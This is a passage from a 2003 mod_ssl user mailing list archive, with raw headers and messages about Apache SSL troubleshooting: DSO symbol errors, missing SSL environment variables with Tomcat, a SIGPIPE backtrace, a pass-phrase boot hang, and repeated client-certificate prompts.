on that.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20
>
>
>Thanks in advance.=20
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  8 21:23:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3C9312AA031; Thu,  8 May 2003 21:23:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41506.mail.yahoo.com (web41506.mail.yahoo.com [66.218.93.89])
	by master.modssl.org (Postfix) with SMTP id BC5A42AA019
	for ; Thu,  8 May 2003 21:23:05 +0200 (CEST)
Message-ID: <20030508192251.65197.qmail@web41506.mail.yahoo.com>
Received: from [130.86.72.20] by web41506.mail.yahoo.com via HTTP; Thu, 08 May 2003 12:22:51 PDT
Date: Thu, 8 May 2003 12:22:51 -0700 (PDT)
From: kulkarni veena 
Subject: errors starting apache2.0.45  with mod_ssl as DSO.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
my question is :

I have set to start Mod-ssl as DSO. When I try to
start apache 2.0.45 i get errors as follows:

# ./httpd -DSSL
Syntax error on line 233 of /etc/apache/httpd.conf:
Cannot load /usr/apache/libexec/mod_ssl.so into
server: ld.so.1: ./httpd: fatal: relocation error:
file /usr/apache/libexec/mod_ssl.so: symbol
X509_INFO_free: referenced symbol not found

any suggestions to rectify it?

thanks in advance.

-veena


__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  8 22:35:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 33D742AA031; Thu,  8 May 2003 22:35:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from heron.mail.pas.earthlink.net (heron.mail.pas.earthlink.net [207.217.120.189])
	by master.modssl.org (Postfix) with ESMTP id E4EFE2AA019
	for ; Thu,  8 May 2003 22:35:17 +0200 (CEST)
Received: from adsl-64-170-116-132.dsl.snfc21.pacbell.net ([64.170.116.132] helo=Apollo)
	by heron.mail.pas.earthlink.net with asmtp (Exim 3.33 #1)
	id 19Ds6k-0006qI-00
	for modssl-users@modssl.org; Thu, 08 May 2003 13:35:14 -0700
Message-ID: <099001c315a1$57168f00$a77ba8c0@Apollo>
From: "Will Glass-Husain" 
To: 
Subject: problem with environment variables (RESEND)
Date: Thu, 8 May 2003 13:35:15 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0989_01C31566.A8887AF0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-ELNK-Trace: 0f504b9e2cba8bfe0cc1426638a40ef67e972de0d01da9405019cf48cdb4267913a3bf3a2cb65e8f350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Will Glass-Husain" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0989_01C31566.A8887AF0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

[Apologies if this note was already on the list- could you resend =
responses? =20
I didn't see it appear on the mail archives, so I've subscribed to the =
list and am
trying again.]

I've recently installed a SSL certificate on a server of mine, and am =
trying
(unsuccessfully) to get it to work with Tomcat 4.1 (mod_jk connector).  =
I've
narrowed the problem down to that the Apache environeent variables don't
exist.   (e.g. HTTPS,  SSL_SESSION_ID, SSL_CIPHER, SSL_CLIENT_CERT).  =
I've
verified with a simple html file that uses SSI  to list =
all
the variables in the SSL site.  No SSL* variables appear in the =
resulting
web page.

I do know that SSL is up and running, because I see the padlock in my
non-Tomcat directories (e.g. with straight HTML or PHP).

Anyone have any ideas?

Here's the relevant lines from my Apache conf.  I'm running Apache =
1.3.19.




        ServerName   broadcast.forio.com
        User         ad
        Group        adgroup
        DocumentRoot /usr/psa/home/vhosts/broadcast.forio.com/httpsdocs
        CustomLog
/usr/psa/home/vhosts/broadcast.forio.com/logs/access_ssl_log combined
        ErrorLog
/usr/psa/home/vhosts/broadcast.forio.com/logs/error_ssl_log
        
                SSLRequireSSL
                SSLOptions +StdEnvVars +ExportCertData
                Options +Includes -ExecCGI
        





        JkExtractSSL On
        JkHTTPSIndicator HTTPS
        JkSESSIONIndicator SSL_SESSION_ID
        JkCIPHERIndicator SSL_CIPHER
        JkCERTSIndicator SSL_CLIENT_CERT

        
                SSLOptions +StdEnvVars +ExportCertData
        



Thanks, WILL



_______________________________________
Forio Business Simulations
Will Glass-Husain
(415) 440-7500 phone
(415) 235-4293 mobile

wglass@forio.com
www.forio.com

------=_NextPart_000_0989_01C31566.A8887AF0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi,


[Apologies if this note was already on =
the list-=20
could you resend responses?  


I didn't see it appear on the mail =
archives, so=20
I've subscribed to the list and am


trying again.]



I've recently installed a =
SSL=20
certificate on a server of mine, and am trying
(unsuccessfully) to =
get it to=20
work with Tomcat 4.1 (mod_jk connector).  I've
narrowed the =
problem down=20
to that the Apache environeent variables don't
exist.   =
(e.g.=20
HTTPS,  SSL_SESSION_ID, SSL_CIPHER, SSL_CLIENT_CERT). =20
I've
verified with a simple html file that uses SSI <!--#printenv =
-->=20
to list all
the variables in the SSL site.  No SSL* variables =
appear in=20
the resulting
web page.

I do know that SSL is up and running, =
because=20
I see the padlock in my
non-Tomcat directories (e.g. with straight =
HTML or=20
PHP).

Anyone have any ideas?

Here's the relevant lines =
from my=20
Apache conf.  I'm running Apache 1.3.19.

<IfModule=20
mod_ssl.c>

<VirtualHost=20
216.40.226.218:443>
       =20
ServerName  =20
broadcast.forio.com
       =20
User        =20
ad
       =20
Group       =20
adgroup
        DocumentRoot=20
/usr/psa/home/vhosts/broadcast.forio.com/httpsdocs
   &=
nbsp;   =20
CustomLog
/usr/psa/home/vhosts/broadcast.forio.com/logs/access_ssl_log=
=20
combined
       =20
ErrorLog
/usr/psa/home/vhosts/broadcast.forio.com/logs/error_ssl_log       =20
<Directory=20
/usr/psa/home/vhosts/broadcast.forio.com/httpsdocs>
  &nb=
sp;           &nbs=
p;=20
SSLRequireSSL
         &n=
bsp;     =20
SSLOptions +StdEnvVars=20
+ExportCertData
         =
      =20
Options +Includes -ExecCGI
        =

</Directory>
</VirtualHost>

</IfModule>
<IfModule=20
mod_ssl.c>
        JkExtractSSL =

On
        JkHTTPSIndicator=20
HTTPS
        JkSESSIONIndicator=20
SSL_SESSION_ID
        =
JkCIPHERIndicator=20
SSL_CIPHER
        =
JkCERTSIndicator=20
SSL_CLIENT_CERT

        =
<Directory=20
"/usr/psa/home/vhosts/broadcast.forio.com/httpsdocs">
  &=
nbsp;           &n=
bsp;=20
SSLOptions +StdEnvVars=20
+ExportCertData
       =20
</Directory>
</IfModule>


Thanks,=20
WILL



_______________________________________
Forio =
Business=20
Simulations
Will Glass-Husain
(415) 440-7500 phone
(415) =
235-4293=20
mobile

wglass@forio.com
www.forio.com


------=_NextPart_000_0989_01C31566.A8887AF0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  9 08:54:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01BE52AA031; Fri,  9 May 2003 08:54:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41505.mail.yahoo.com (web41505.mail.yahoo.com [66.218.93.88])
	by master.modssl.org (Postfix) with SMTP id DA52B2AA015
	for ; Fri,  9 May 2003 08:54:40 +0200 (CEST)
Message-ID: <20030509065431.55839.qmail@web41505.mail.yahoo.com>
Received: from [130.86.24.105] by web41505.mail.yahoo.com via HTTP; Thu, 08 May 2003 23:54:31 PDT
Date: Thu, 8 May 2003 23:54:31 -0700 (PDT)
From: kulkarni veena 
Subject:  errors starting apache2.0.45  with mod_ssl as DSO.
To: modssl-users@modssl.org
In-Reply-To: <20030508192251.65197.qmail@web41506.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

BTW, this is on Solaris 2.9 OS.

--- kulkarni veena  wrote:
> Hello,
> my question is :
> 
> I have set to start Mod-ssl as DSO. When I try to
> start apache 2.0.45 i get errors as follows:
> 
> # ./httpd -DSSL
> Syntax error on line 233 of /etc/apache/httpd.conf:
> Cannot load /usr/apache/libexec/mod_ssl.so into
> server: ld.so.1: ./httpd: fatal: relocation error:
> file /usr/apache/libexec/mod_ssl.so: symbol
> X509_INFO_free: referenced symbol not found
> 
> any suggestions to rectify it?
> 
> thanks in advance.
> 
> -veena
> 
> 
> __________________________________
> Do you Yahoo!?
> The New Yahoo! Search - Faster. Easier. Bingo.
> http://search.yahoo.com
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  9 09:52:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4760C2AA031; Fri,  9 May 2003 09:52:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bgeorges.spinweb.net (bgeorges.spinweb.net [161.58.244.134])
	by master.modssl.org (Postfix) with ESMTP id E83282AA015
	for ; Fri,  9 May 2003 09:52:31 +0200 (CEST)
Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146]) by bgeorges.spinweb.net (8.12.9) id h497qKbB017115 for ; Fri, 9 May 2003 01:52:26 -0600 (MDT)
Date: Fri, 9 May 2003 08:52:23 +0100
Subject: Re: errors starting apache2.0.45  with mod_ssl as DSO.
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Bruno Georges 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <20030509065431.55839.qmail@web41505.mail.yahoo.com>
Message-Id: <2B48D7D9-81F3-11D7-9EEC-000393A47BCC@xbridge.com>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bruno Georges 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Did you compile openssl as shared or static?
If static then you need to build openssl with shared option.

Hope this helps.

Bruno Georges
Xbridge Ltd
Tel: +44 (0) 207 378 9830
Mob: +44 (0) 787 988 4895

On Friday, May 9, 2003, at 07:54 Europe/London, kulkarni veena wrote:

> BTW, this is on Solaris 2.9 OS.
>
> --- kulkarni veena  wrote:
>> Hello,
>> my question is :
>>
>> I have set to start Mod-ssl as DSO. When I try to
>> start apache 2.0.45 i get errors as follows:
>>
>> # ./httpd -DSSL
>> Syntax error on line 233 of /etc/apache/httpd.conf:
>> Cannot load /usr/apache/libexec/mod_ssl.so into
>> server: ld.so.1: ./httpd: fatal: relocation error:
>> file /usr/apache/libexec/mod_ssl.so: symbol
>> X509_INFO_free: referenced symbol not found
>>
>> any suggestions to rectify it?
>>
>> thanks in advance.
>>
>> -veena
>>
>>
>> __________________________________
>> Do you Yahoo!?
>> The New Yahoo! Search - Faster. Easier. Bingo.
>> http://search.yahoo.com
>>
> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)
>>    www.modssl.org
>> User Support Mailing List
>> modssl-users@modssl.org
>> Automated List Manager
> majordomo@modssl.org
>
>
> __________________________________
> Do you Yahoo!?
> The New Yahoo! Search - Faster. Easier. Bingo.
> http://search.yahoo.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  9 21:15:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E99CD2AA031; Fri,  9 May 2003 21:15:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.zyanka.li (angband.zyanka.li [213.133.108.187])
	by master.modssl.org (Postfix) with ESMTP id CD3F82AA015
	for ; Fri,  9 May 2003 21:15:37 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.zyanka.li (Postfix) with ESMTP id 8A5D22D801B
	for ; Fri,  9 May 2003 21:15:33 +0200 (CEST)
Received: by mail.zyanka.li (Postfix, from userid 103)
	id 228EB2D801A; Fri,  9 May 2003 21:15:33 +0200 (CEST)
Received: from pc4p.net (pD950AA26.dip.t-dialin.net [217.80.170.38])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by mail.zyanka.li (Postfix) with ESMTP id BA2892D801B
	for ; Fri,  9 May 2003 21:14:48 +0200 (CEST)
Message-ID: <3EBBFE25.3000909@pc4p.net>
Date: Fri, 09 May 2003 21:14:45 +0200
From: Alexander Wirtz 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4b) Gecko/20030506
X-Accept-Language: en-us, en
To: modssl-users@modssl.org
Subject: Sigpipes in ssl_io_hook_writev
X-Spam-Status: No, hits=-11.0 required=5.0
	tests=BAYES_00,RCVD_IN_NJABL,RCVD_IN_OSIRUSOFT_COM,
	      USER_AGENT_MOZILLA_UA
	autolearn=ham version=2.53
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.53 (1.174.2.15-2003-03-30-exp)
X-Sanitizer: Advosys mail filter
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by AMaViS snapshot-20020222
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alexander Wirtz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Okay, I hope I'm not repeating myself, 'cause the majordomo apparently
moved my mail to /dev/zero a few days ago...

System is a Linux Debian Woody,
libssl 0.9.6c-2.woody,
libmm 1.1.3-6.1
from Debian archive

Apache 1.3.27,
mod_ssl 2.8.14-1.3.27,
PHP 4.3 CVS
handmade with APACI

CFLAGS=-g \
SSL_BASE=SYSTEM \
EAPI_MM=SYSTEM \
./configure \
--prefix=/usr/local/apache \
--logfiledir=/var/log/apache \
--runtimedir=/var/run \
--enable-rule=SHARED_CORE \
--disable-module=userdir \
--disable-module=status \
--enable-module=so \
--enable-module=ssl \
--enable-module=rewrite \
--enable-module=speling \
--enable-module=vhost_alias \
--enable-shared=ssl \
--enable-shared=rewrite \
--enable-shared=speling \
--enable-shared=vhost_alias \
--permute-module=ssl:END

Exhibit 1:
----------
Program received signal SIGPIPE, Broken pipe.
0x401d7277 in ?? ()
(gdb) bt
#0  0x401d7277 in ?? ()
#1  0x40782bfa in ssl_io_hook_writev () from
/usr/local/apache/libexec/libssl.so
#2  0x40066ce1 in ap_hook_call_func () from /lib/libdb.so.2
#3  0x400663d4 in ap_hook_call () from /lib/libdb.so.2
#4  0x4003c9a8 in writev_it_all () from /lib/libcrypt.so.1
#5  0x4003ce4e in large_write () from /lib/libcrypt.so.1
#6  0x4003cf27 in ap_bwrite () from /lib/libcrypt.so.1
#7  0x40053b52 in ap_rwrite () from /lib/libcrypt.so.1
#8  0x404e3562 in sapi_apache_ub_write (
    str=0x82b26f4 "\n

_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? Télécharger MSN Messenger
http://www.ifrance.com/_reloc/m la 1ère messagerie instantanée de France

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


  






--------------020409060002040702080304--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 14 18:57:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D3D592AA03A; Wed, 14 May 2003 18:57:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail3.panix.com (mail3.panix.com [166.84.1.74])
	by master.modssl.org (Postfix) with ESMTP id C3A262AA027
	for ; Wed, 14 May 2003 18:57:17 +0200 (CEST)
Received: from panix2.panix.com (panix2.panix.com [166.84.1.2])
	by mail3.panix.com (Postfix) with ESMTP id 359129820A
	for ; Wed, 14 May 2003 12:57:16 -0400 (EDT)
Received: (from jester@localhost)
	by panix2.panix.com (8.11.6p2/8.8.8/PanixN1.0) id h4EGvGl17907
	for modssl-users@modssl.org; Wed, 14 May 2003 12:57:16 -0400 (EDT)
Date: Wed, 14 May 2003 12:57:16 -0400
From: Jesse Sheidlower 
To: modssl-users@modssl.org
Subject: Startup problems
Message-ID: <20030514165716.GA17044@panix.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jesse Sheidlower 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I recently installed mod_ssl on my Apache configuration
(Apache 1.3.27 on FreeBSD 4.8); this went relatively
smoothly, with close followings of the docs. I generated
my own certificate and self-signed it.

I followed the FAQ entry about eliminating the pass-phrase
dialog at startup. However, when I startup my system, the
boot process hangs at the "Local package initialization" 
stage (which on FreeBSD runs the shell scripts in 
/usr/local/etc/rc.d) when it starts Apache. I can ctrl-C
out of it and everything else goes fine, and Apache will
have started properly with everything enabled, but if I 
don't ctrl-C it'll never move on.

I'm particularly concerned because I have a remotely
hosted server running the same setup, and if this
happens to it, I'd need someone to be there physically
at the console to hit ctrl-C.

Any thoughts about how to debug this would be most welcome.

Thanks.

Jesse Sheidlower
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 14 21:07:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 985AB2AA03A; Wed, 14 May 2003 21:07:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from th23.opsion.fr (th23.opsion.fr [62.39.122.33])
	by master.modssl.org (Postfix) with SMTP id AA3C42AA019
	for ; Wed, 14 May 2003 21:07:35 +0200 (CEST)
Received: from 62.212.108.2 [62.212.108.2] by th23.opsion.fr id 200305141903.297f; Wed, 14 May 2003 19:03:42 GMT
From: "Matthieu Estrade" 
To: 
Subject: RE : Apache 2 and client authenticaction
Date: Wed, 14 May 2003 21:06:05 +0200
Message-ID: <000001c31a4b$e2d19040$0100a8c0@poulet>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0001_01C31A5C.A65EF420"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
In-Reply-To: <3EC26FF8.7060906@camerfirma.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Matthieu Estrade" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0001_01C31A5C.A65EF420
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,
=20
I have exactly the same logs as yours.
But i think when you say it asks the password, it=92s the passphrase of
the private key of client certificate.
When i do my test, i use IE and it=92s show me many times the client
certificate list to make me choose one.
=20
I am continuing to search...
=20
Regards,
=20
Estrade Matthieu
=20
-----Message d'origine-----
De : owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] De la part de Juan Angel Martin
Envoy=E9 : mercredi 14 mai 2003 18:34
=C0 : modssl-users@modssl.org
Objet : Re: Apache 2 and client authenticaction
=20
Hi,

This the part of log obtained when I request one html page with two
frames. The browser asks me for the password 4 times.

[info] Connection to child 1 established (xxx.xxx.xxx:4443, client
xxx.xxx.xxx.xxx)
[info] Seeding PRNG with 512 bytes of entropy
[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start

[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done
[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher:
RC4-MD5 (128/128 bits)
[info] Initial (No.1) HTTPS request received for child 1
(xxx.xxx.xxx:4443)
[info] Connection to child 1 closed with unclean
shutdown(xxx.xxx.xxx:4443, client xxx.xxx.xxx.xxx)
[info] Connection to child 6 established (xxx.xxx.xxx:4443, client
xxx.xxx.xxx.xxx)
[info] Seeding PRNG with 512 bytes of entropy
[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start

[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done
[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher:
RC4-MD5 (128/128 bits)
[info] Initial (No.1) HTTPS request received for child 6
(xxx.xxx.xxx:4443)
[info] Connection to child 6 closed with unclean
shutdown(xxx.xxx.xxx:4443, client xxx.xxx.xxx.xxx)
[info] Connection to child 5 established (xxx.xxx.xxx:4443, client
xxx.xxx.xxx.xxx)
[info] Seeding PRNG with 512 bytes of entropy
[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start
[info] Connection to child 3 established (xxx.xxx.xxx:4443, client
xxx.xxx.xxx.xxx)
[info] Seeding PRNG with 512 bytes of entropy
[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start

[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done
[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher:
RC4-MD5 (128/128 bits)

[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done
[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher:
RC4-MD5 (128/128 bits)

[info] Initial (No.1) HTTPS request received for child 5
(xxx.xxx.xxx:4443)
[info] Initial (No.1) HTTPS request received for child 3
(xxx.xxx.xxx:4443)
[info] Connection to child 5 closed with unclean
shutdown(xxx.xxx.xxx:4443, client xxx.xxx.xxx.xxx)
[info] Connection to child 3 closed with unclean
shutdown(xxx.xxx.xxx:4443, client xxx.xxx.xxx.xxx)

You can see that there is 4 connections. But every connection is closed
with unclean shutdown, I don't know why.

Regards
Juanan


Nauman, Ahmed [IT] escribi=F3:


Hi all,
=20
I had earlier mailed my problem also related to client authentication.
That i have set apache with mod ssl for mutual authentication, but
client certificate does not seem to be transferred for authentication.
But surprizingly this is happening when i mention CA of client in
httpd.conf for Server as=20
"SSLCACertificateFile" directive. If i don't mention this directive, it
displays a message on browser side that certificate is not from some of
the trusted CA. If we see the log, [Please see list archive for my
previous message] either the Server is not loading the certificate of
client's CA properly or client Certificate does not seem to be returned
when server asks for it.
=20
Please advise.
=20
Regards
Nauman
=20
-----Original Message-----
From: Estrade Matthieu [mailto:estrade-m@ifrance.com]
Sent: Wednesday, May 14, 2003 8:24 AM
To: modssl-users@modssl.org
Subject: Re: Apache 2 and client authenticaction
=20
=20
Hi,
=20
I have exactly the same problem. On each new document (not in temp file=20
of IE), my browser ask me to choose which client certificate i want to=20
use for the secured web site.
Even if i have only one.
First, i was thinking it was because of the browser, so i looked into IE

configuration, but i found nothing.
Then i look with apache in debug mode and i saw that the client seems to

no send again the certificate.
=20
Maybe it's a problem of session handling. i played with SessionCache=20
parameters and SessionCacheTimeout, but nothing more happened.
I will try to find more debug information.
=20
Regards,
=20
Estrade Matthieu
=20
Juan Angel Martin wrote:
=20
 =20
Hi all,
=20
I have one Linux server with Apache 1.3.27 and it's configured for=20
client authentication in one port.
=20
When I connect with it at that port with IE 6.0.or Netscape 7.0 or=20
4.78, the server asks me the container's password that keeps the=20
private key needed for authenticate me only one time.
=20
But I have another with Apache 2.0.45, configured as the other one=20
with 1.3.27; it has the same SSL virtual hosts configuration options.
=20
With this server, the server asks me the container's password that=20
keeps the private key needed for authenticate me for every frame o=20
picture that the page shows.
=20
How can I get that the server with Apache 2.0.45 only asks me for the=20
password one time like the other one with Apache 1.3.27?
=20
Thanks in advance
Juanan
=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? T=E9l=E9charger MSN =
Messenger
http://www.ifrance.com/_reloc/m la 1=E8re messagerie instantan=E9e de =
France
=20
   =20
=20
=20
_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? T=E9l=E9charger MSN =
Messenger
http://www.ifrance.com/_reloc/m la 1=E8re messagerie instantan=E9e de =
France
=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
=20
=20
 =20
=20

------=_NextPart_000_0001_01C31A5C.A65EF420
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable























Hi,



 



I
have exactly the same logs as yours.



But
i think when you say it asks the password, it’s the passphrase of =
the
private key of client certificate.



When
i do my test, i use IE and it’s show me many times the client =
certificate
list to make me choose one.



 



I
am continuing to search...



 



Regards,



 



Estrade
Matthieu



 



-----Message =
d'origine-----

De : =
owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] De la
part de Juan Angel Martin

Envoy=E9 : mercredi =
14 mai 2003
18:34

=C0 : =
modssl-users@modssl.org

Objet : Re: Apache 2 =
and
client authenticaction



 



Hi,



This the part of log obtained when I request one html page with two =
frames. The
browser asks me for the password 4 times.



[info] Connection =
to child 1
established (xxx.xxx.xxx:4443, client xxx.xxx.xxx.xxx)

[info] Seeding PRNG with 512 bytes of entropy

[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start



[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done

[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher: =
RC4-MD5
(128/128 bits)

[info] Initial (No.1) HTTPS request received for child 1 =
(xxx.xxx.xxx:4443)

[info] Connection to child 1 closed with unclean =
shutdown(xxx.xxx.xxx:4443,
client xxx.xxx.xxx.xxx)

[info] Connection to child 6 established (xxx.xxx.xxx:4443, client =
xxx.xxx.xxx.xxx)

[info] Seeding PRNG with 512 bytes of entropy

[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start



